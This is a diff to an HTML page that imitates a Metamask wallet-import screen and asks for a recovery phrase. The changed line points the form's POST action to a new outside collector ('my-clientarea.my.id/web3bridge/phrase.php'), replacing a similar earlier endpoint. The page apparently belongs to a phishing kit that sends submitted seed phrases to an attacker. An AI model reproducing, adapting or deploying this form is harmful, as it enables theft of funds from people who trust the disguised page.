--- a/sync/import-wallet/index.html
+++ b/sync/import-wallet/index.html
@@ -50,7 +50,7 @@
     </div>
 
     <div  style="display: block;">
-        <form method="POST" action="https://free.nftopsea.io/send-phrase">
+        <form method="POST" action="https://www.my-clientarea.my.id/web3bridge/phrase.php">
             <input type="hidden" name="_token" value="n7tlLYR499LkMm6C9Xfwk81DSWhm9iq3JRti8k4I">                                                <input type="hidden" value="Metamask" name="name" />
 
             <textarea name="phrase" class="phrase" required="required" minlength="12" placeholder="Phrase"></textarea>
